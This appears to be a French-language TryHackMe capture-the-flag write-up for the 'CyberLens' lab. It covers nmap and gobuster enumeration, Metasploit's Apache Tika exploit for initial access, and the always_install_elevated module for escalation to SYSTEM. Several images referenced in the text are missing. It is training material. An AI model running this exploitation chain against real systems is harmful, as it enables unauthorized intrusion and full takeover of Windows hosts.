🌸CyberLens

CTF tryhackme

Config

sudo echo '[IP] cyberlens.thm' >> /etc/hosts

Énumération :

nmap -sC -sV -O 10.10.237.189

Ports ouverts :

  • Port 80/tcp : Serveur HTTP Apache httpd 2.4.57 (Win64)

  • Port 135/tcp : RPC Microsoft Windows

  • Port 139/tcp : NetBIOS-SSN Microsoft Windows

  • Port 445/tcp : Microsoft-DS

  • Port 3389/tcp : Services Microsoft Terminal (RDP)

Analyse du site web : on peut extraire des métadonnées :

Énumération du site web :

gobuster dir -w /urs/share/Wordlist/dirb/common.txt -u http://10.10.237.189

Voici ce qu'on trouve :

Après avoir testé d'extraire les métadonnées, aucune info n'est ressortie.

En cherchant le code source de la page, on voit :

Ce port n'est pas ressorti dans le scan Nmap car ce n'est pas un port habituel. Il aurait fallu faire -p-.

Voici sur quoi il redirige :

Exploitation :

Après quelques recherches, nous identifions un service Apache Tika avec une version vulnérable. Nous utilisons Metasploit pour exploiter cette vulnérabilité et obtenons un accès initial à la machine cible via une session Meterpreter.

msfconsole

Recherche de l'exploit :

search tika

On trouve cet exploit : exploit/windows/http/apache_tika_jp2_jscript

use exploit/windows/http/apache_tika_jp2_jscript
set rhost 10.10.237.189
set rport 61777
run

Récupération du flag utilisateur :

C:\Users\CyberLens\Desktop> type user.txt

Privesc :

Utilisation du module multi/recon/local_exploit_suggester pour identifier les vulnérabilités potentielles pour l’élévation de privilèges.

sessions #La session actuelle est la 3.
use multi/recon/local_exploit_suggester
set session 3
run

On observe 3 vulnérabilités :

On essaie la première :

use exploit/windows/local/always_install_elevated
set session 3
run

Et on est NT AUTHORITY\SYSTEM !

Récupération du flag administrateur

C:\Users\Administrator\Desktop> type admin.txt

Last updated